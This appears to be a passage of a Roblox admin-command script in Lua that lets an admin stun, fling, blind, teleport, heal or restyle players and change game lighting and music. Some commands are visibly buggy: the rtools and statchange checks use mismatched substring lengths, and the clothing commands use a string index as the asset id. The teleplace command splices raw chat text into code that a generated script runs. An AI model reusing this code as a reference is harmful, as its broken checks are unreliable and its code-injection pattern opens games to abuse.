  1261.  
  1262. if Cmd.Text:lower():sub(1,5) == "stun " then
  1263. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1264. for i, v in pairs(plrz) do
  1265. coroutine.resume(coroutine.create(function()
  1266. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1267. v.Character.Humanoid.PlatformStand = true
  1268. end
  1269. end))
  1270. end
  1271. end
  1272.  
  1273. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1274. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1275. for i, v in pairs(plrz) do
  1276. coroutine.resume(coroutine.create(function()
  1277. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1278. v.Character.Humanoid.PlatformStand = false
  1279. end
  1280. end))
  1281. end
  1282. end
  1283.  
  1284. if Cmd.Text:lower():sub(1,5) == "jump " then
  1285. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1286. for i, v in pairs(plrz) do
  1287. coroutine.resume(coroutine.create(function()
  1288. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1289. v.Character.Humanoid.Jump = true
  1290. end
  1291. end))
  1292. end
  1293. end
  1294.  
  1295. if Cmd.Text:lower():sub(1,4) == "sit " then
  1296. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1297. for i, v in pairs(plrz) do
  1298. coroutine.resume(coroutine.create(function()
  1299. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1300. v.Character.Humanoid.Sit = true
  1301. end
  1302. end))
  1303. end
  1304. end
  1305.  
  1306. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1307. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1308. for i, v in pairs(plrz) do
  1309. coroutine.resume(coroutine.create(function()
  1310. if v and v.Character then
  1311. for a, obj in pairs(v.Character:children()) do
  1312. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1313. end
  1314. end
  1315. end))
  1316. end
  1317. end
  1318.  
  1319. if Cmd.Text:lower():sub(1,8) == "visible " then
  1320. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1321. for i, v in pairs(plrz) do
  1322. coroutine.resume(coroutine.create(function()
  1323. if v and v.Character then
  1324. for a, obj in pairs(v.Character:children()) do
  1325. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1326. end
  1327. end
  1328. end))
  1329. end
  1330. end
  1331.  
  1332.  
  1333.  
  1334. if Cmd.Text:lower():sub(1,5) == "fire " then
  1335. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1336. for i, v in pairs(plrz) do
  1337. coroutine.resume(coroutine.create(function()
  1338. if v and v.Character and v.Character:findFirstChild("Torso") then
  1339. local cl = Instance.new("Fire", v.Character.Torso)
  1340. end
  1341. end))
  1342. end
  1343. end
  1344.  
  1345. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1346. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1347. for i, v in pairs(plrz) do
  1348. coroutine.resume(coroutine.create(function()
  1349. if v and v.Character and v.Character:findFirstChild("Torso") then
  1350. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1351. end
  1352. end))
  1353. end
  1354. end
  1355.  
  1356. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1357. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1358. for i, v in pairs(plrz) do
  1359. coroutine.resume(coroutine.create(function()
  1360. if v and v.Character and v.Character:findFirstChild("Torso") then
  1361. local cl = Instance.new("Smoke", v.Character.Torso)
  1362. end
  1363. end))
  1364. end
  1365. end
  1366.  
  1367. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1368. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1369. for i, v in pairs(plrz) do
  1370. coroutine.resume(coroutine.create(function()
  1371. if v and v.Character and v.Character:findFirstChild("Torso") then
  1372. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1373. end
  1374. end))
  1375. end
  1376. end
  1377.  
  1378. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1379. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1380. for i, v in pairs(plrz) do
  1381. coroutine.resume(coroutine.create(function()
  1382. if v and v.Character and v.Character:findFirstChild("Torso") then
  1383. local cl = Instance.new("Sparkles", v.Character.Torso)
  1384. end
  1385. end))
  1386. end
  1387. end
  1388.  
  1389. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1390. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1391. for i, v in pairs(plrz) do
  1392. coroutine.resume(coroutine.create(function()
  1393. if v and v.Character and v.Character:findFirstChild("Torso") then
  1394. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1395. end
  1396. end))
  1397. end
  1398. end
  1399.  
  1400. if Cmd.Text:lower():sub(1,3) == "ff " then
  1401. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1402. for i, v in pairs(plrz) do
  1403. coroutine.resume(coroutine.create(function()
  1404. if v and v.Character then Instance.new("ForceField", v.Character) end
  1405. end))
  1406. end
  1407. end
  1408.  
  1409. if Cmd.Text:lower():sub(1,5) == "unff " then
  1410. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1411. for i, v in pairs(plrz) do
  1412. coroutine.resume(coroutine.create(function()
  1413. if v and v.Character then
  1414. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1415. end
  1416. end))
  1417. end
  1418. end
  1419.  
  1420. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1421. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1422. for i, v in pairs(plrz) do
  1423. coroutine.resume(coroutine.create(function()
  1424. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1425. for a, obj in pairs(v.Character:children()) do
  1426. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1427. end
  1428. end
  1429. end))
  1430. end
  1431. end
  1432.  
  1433. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1434. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1435. for i, v in pairs(plrz) do
  1436. coroutine.resume(coroutine.create(function()
  1437. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1438. for a, obj in pairs(v.Character:children()) do
  1439. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1440. end
  1441. end
  1442. end))
  1443. end
  1444. end
  1445.  
  1446.  
  1447.  
  1448. if Cmd.Text:lower():sub(1,4) == "god " then
  1449. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1450. for i, v in pairs(plrz) do
  1451. coroutine.resume(coroutine.create(function()
  1452. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1453. v.Character.Humanoid.MaxHealth = math.huge
  1454. v.Character.Humanoid.Health = 9e9
  1455. end
  1456. end))
  1457. end
  1458. end
  1459.  
  1460. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1461. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1462. for i, v in pairs(plrz) do
  1463. coroutine.resume(coroutine.create(function()
  1464. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1465. v.Character.Humanoid.MaxHealth = 100
  1466. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1467. end
  1468. end))
  1469. end
  1470. end
  1471.  
  1472. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1473. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1474. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1475. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1476. end
  1477.  
  1478. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1479. game.Lighting.Brightness = Cmd.Text:sub(12)
  1480. end
  1481.  
  1482. if Cmd.Text:lower():sub(1,5) == "time " then
  1483. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1484. end
  1485.  
  1486. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1487. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1488. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1489. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1490. end
  1491.  
  1492. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1493. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1494. end
  1495.  
  1496. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1497. game.Lighting.FogStart = Cmd.Text:sub(10)
  1498. end
  1499.  
  1500.  
  1501.  
  1502. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1503. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1504. for i, v in pairs(plrz) do
  1505. coroutine.resume(coroutine.create(function()
  1506. if v and v.Character and v:findFirstChild("Backpack") then
  1507. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1508. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1509. end
  1510. end))
  1511. end
  1512. end
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519.  
  1520. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1521. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1522. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1523. for i, v in pairs(plrz) do
  1524. coroutine.resume(coroutine.create(function()
  1525. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1526. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1527. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1528. end
  1529. end))
  1530. end
  1531. end
  1532.  
  1533. if Cmd.Text:lower():sub(1,6) == "speed " then
  1534. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1535. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1536. for i, v in pairs(plrz) do
  1537. coroutine.resume(coroutine.create(function()
  1538. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1539. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1540. end
  1541. end))
  1542. end
  1543. end
  1544.  
  1545.  
  1546. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1547. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1548. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1549. for i, v in pairs(plrz) do
  1550. coroutine.resume(coroutine.create(function()
  1551. if v and v:findFirstChild("PlayerGui") then
  1552. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1553. end
  1554. end))
  1555. end
  1556. end
  1557.  
  1558. if Cmd.Text:lower():sub(1,3) == "tp " then
  1559. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1560. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1561. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1562. for i, v in pairs(plrz) do
  1563. coroutine.resume(coroutine.create(function()
  1564. for i2, v2 in pairs(plrz2) do
  1565. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1566. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1567. end
  1568. end
  1569. end))
  1570. end
  1571. end
  1572.  
  1573. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1574. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1575. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1576. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1577. for i, v in pairs(plrz) do
  1578. coroutine.resume(coroutine.create(function()
  1579. if v and v:findFirstChild("leaderstats") then
  1580. for a, st in pairs(v.leaderstats:children()) do
  1581. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1582. end
  1583. end
  1584. end))
  1585. end
  1586. end
  1587.  
  1588. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1589. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1590. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1591. for i, v in pairs(plrz) do
  1592. coroutine.resume(coroutine.create(function()
  1593. if v and v.Character then
  1594. for i,v in pairs(v.Character:children()) do
  1595. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1596. end
  1597. end
  1598. end))
  1599. end
  1600. end
  1601.  
  1602. if Cmd.Text:lower():sub(1,6) == "pants " then
  1603. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1604. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1605. for i, v in pairs(plrz) do
  1606. coroutine.resume(coroutine.create(function()
  1607. if v and v.Character then
  1608. for i,v in pairs(v.Character:children()) do
  1609. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1610. end
  1611. end
  1612. end))
  1613. end
  1614. end
  1615.  
  1616. if Cmd.Text:lower():sub(1,5) == "gear " then
  1617. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1618. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1619. for i, v in pairs(plrz) do
  1620. if Cmd.Text:lower():sub(6) == "all" then return end
  1621. if Cmd.Text:lower():sub(6) == "others"then return end
  1622. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1623. coroutine.resume(coroutine.create(function()
  1624. if v and v:findFirstChild("Backpack") then
  1625. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1626. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1627. obj:Destroy()
  1628. end
  1629. end))
  1630. end
  1631. end
  1632.  
  1633. if Cmd.Text:lower():sub(1,5) == "face " then
  1634. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1635. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1636. for i, v in pairs(plrz) do
  1637. coroutine.resume(coroutine.create(function()
  1638. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1639. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1640. end
  1641. end))
  1642. end
  1643. end
  1644.  
  1645.  
  1646.  
  1647.  
  1648.  
  1649.  
  1650. if Cmd.Text:lower():sub(1,6) == "music " then
  1651. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1652. local id = Cmd.Text:sub(7)
  1653. local pitch = 1
  1654. if tostring(id):lower():find("caramell") then id = 2303479 end
  1655. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1656. if tostring(id):find("rick") then id = 2027611 end
  1657. if tostring(id):find("halo") then id = 1034065 end
  1658. if tostring(id):find("pokemon") then id = 1372261 end
  1659. if tostring(id):find("cursed") then id = 1372257 end
  1660. if tostring(id):find("extreme") then id = 11420933 end
  1661. if tostring(id):find("awaken") then id = 27697277 end
  1662. if tostring(id):find("alone") then id = 27697392 end
  1663. if tostring(id):find("mario") then id = 1280470 end
  1664. if tostring(id):find("choir") then id = 1372258 end
  1665. if tostring(id):find("chrono") then id = 1280463 end
  1666. if tostring(id):find("dotr") then id = 11420922 end
  1667. if tostring(id):find("entertain") then id = 27697267 end
  1668. if tostring(id):find("fantasy") then id = 1280473 end
  1669. if tostring(id):find("final") then id = 1280414 end
  1670. if tostring(id):find("emblem") then id = 1372259 end
  1671. if tostring(id):find("flight") then id = 27697719 end
  1672. if tostring(id):find("banjo") then id = 27697298 end
  1673. if tostring(id):find("gothic") then id = 27697743 end
  1674. if tostring(id):find("hiphop") then id = 27697735 end
  1675. if tostring(id):find("intro") then id = 27697707 end
  1676. if tostring(id):find("mule") then id = 1077604 end
  1677. if tostring(id):find("film") then id = 27697713 end
  1678. if tostring(id):find("nezz") then id = 8610025 end
  1679. if tostring(id):find("angel") then id = 1372260 end
  1680. if tostring(id):find("resist") then id = 27697234 end
  1681. if tostring(id):find("schala") then id = 5985787 end
  1682. if tostring(id):find("organ") then id = 11231513 end
  1683. if tostring(id):find("tunnel") then id = 9650822 end
  1684. if tostring(id):find("spanish") then id = 5982975 end
  1685. if tostring(id):find("venom") then id = 1372262 end
  1686. if tostring(id):find("wind") then id = 1015394 end
  1687. if tostring(id):find("guitar") then id = 5986151 end
  1688. if tostring(id):find("fox") then id = 130797915 end
  1689. if tostring(id):find("gangnam") then id = 130844430 end
  1690. if tostring(id):find("nyan") then id = 130786686 end
  1691. if tostring(id):find("harlem") then id = 131154740 end
  1692. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1693. end
  1694.  
  1695. if Cmd.Text:lower() == "stopmusic" then
  1696. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1697. end
  1698.  
  1699. if Cmd.Text:lower() == "musiclist" then
  1700. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1701. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1702. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1703. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1704. end
  1705.  
  1706.  
  1707. if Cmd.Text:lower():sub(1,5) == "spin " then
  1708. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1709. for i, v in pairs(plrz) do
  1710. coroutine.resume(coroutine.create(function()
  1711. if v and v.Character and v.Character:findFirstChild("Torso") then
  1712. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1713. local torso = v.Character:findFirstChild("Torso")
  1714. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1715. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1716. until not bg or bg.Parent ~= torso
  1717. end
  1718. end))
  1719. end
  1720. end
  1721.  
  1722. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1723. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1724. for i, v in pairs(plrz) do
  1725. coroutine.resume(coroutine.create(function()
  1726. if v and v.Character and v.Character:findFirstChild("Torso") then
  1727. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1728. end
  1729. end))
  1730. end
  1731. end
  1732.  
  1733.  
  1734.  
  1735. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1736. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1737. for i, v in pairs(plrz) do
  1738. coroutine.resume(coroutine.create(function()
  1739. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1740. end))
  1741. end
  1742. end
  1743.  
  1744. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1745. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1746. for i, v in pairs(plrz) do
  1747. coroutine.resume(coroutine.create(function()
  1748. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1749. end))
  1750. end
  1751. end
  1752.  
  1753. if Cmd.Text:lower():sub(1,6) == "fling " then
  1754. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1755. for i, v in pairs(plrz) do
  1756. coroutine.resume(coroutine.create(function()
  1757. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1758. local xran local zran
  1759. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1760. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1761. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1762. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1763. end
  1764. end))
  1765. end
  1766. end
  1767.  
  1768. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1769. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1770. for i, v in pairs(plrz) do
  1771. coroutine.resume(coroutine.create(function()
  1772. if v and v.Character then
  1773. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1774. end
  1775. end))
  1776. end
  1777. end
  1778.  
  1779. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1780. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1781. for i, v in pairs(plrz) do
  1782. coroutine.resume(coroutine.create(function()
  1783. if v and v.Character then
  1784. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1785. wait(.1) v.Character.Humanoid.PlatformStand = false
  1786. end
  1787. end))
  1788. end
  1789. end
  1790.  
  1791. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1792. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1793. for i, v in pairs(plrz) do
  1794. coroutine.resume(coroutine.create(function()
  1795. if v and v.Character then
  1796. for a, obj in pairs(v.Character:children()) do
  1797. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1798. end
  1799. end
  1800. end))
  1801. end
  1802. end
  1803.  
  1804.  
  1805. if Cmd.Text:lower():sub(1,5) == "char " then
  1806. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1807. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1808. for i, v in pairs(plrz) do
  1809. coroutine.resume(coroutine.create(function()
  1810. if v and v.Character then
  1811. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1812. v:LoadCharacter()
  1813. end
  1814. end))
  1815. end
  1816. end
  1817.  
  1818. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1819. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1820. for i, v in pairs(plrz) do
  1821. coroutine.resume(coroutine.create(function()
  1822. if v and v.Character then
  1823. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1824. v:LoadCharacter()
  1825. end
  1826. end))
  1827. end
  1828. end
  1829.  
  1830.  
  1831.  
  1832. if Cmd.Text:lower():sub(1,7) == "normal " then
  1833. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1834. for i, v in pairs(plrz) do
  1835. coroutine.resume(coroutine.create(function()
  1836. if v and v.Character and v.Character:findFirstChild("Torso") then
  1837. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1838. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1839. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1840. v.Character.Torso.Transparency = 0
  1841. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1842. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1843. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1844. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1845. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1846. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1847. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1848. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1849. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1850. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1851. end end
  1852. end
  1853. end))
  1854. end
  1855. end
  1856.  
  1857. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1858. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1859. for i, v in pairs(plrz) do
  1860. coroutine.resume(coroutine.create(function()
  1861. if v and v:findFirstChild("PlayerGui")then
  1862. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1863. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1864. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1865. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1866. end
  1867. end))
  1868. end
  1869. end
  1870.  
  1871. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1872. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1873. for i, v in pairs(plrz) do
  1874. coroutine.resume(coroutine.create(function()
  1875. if v and v:findFirstChild("PlayerGui") then
  1876. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1877. end
  1878. end))
  1879. end
  1880. end
  1881.  
  1882.  
  1883. if Cmd.Text:lower():sub(1,6) == "blind " then
  1884. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1885. for i, v in pairs(plrz) do
  1886. coroutine.resume(coroutine.create(function()
  1887. if v and v:findFirstChild("PlayerGui") then
  1888. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1889. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1890. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1891. end
  1892. end))
  1893. end
  1894. end
  1895.  
  1896. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1897. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1898. for i, v in pairs(plrz) do
  1899. coroutine.resume(coroutine.create(function()
  1900. if v and v:findFirstChild("PlayerGui") then
  1901. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1902. end
  1903. end))
  1904. end
  1905. end
  1906.  
  1907. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1908. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1909. for i, v in pairs(plrz) do
  1910. coroutine.resume(coroutine.create(function()
  1911. if v and v:findFirstChild("PlayerGui") then
  1912. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1913. end
  1914. end))
  1915. end
  1916. end
  1917.  
  1918. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1919. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1920. for i, v in pairs(plrz) do
  1921. if v then
  1922. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1923. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1924. repeat wait()
  1925. coroutine.resume(coroutine.create(function()
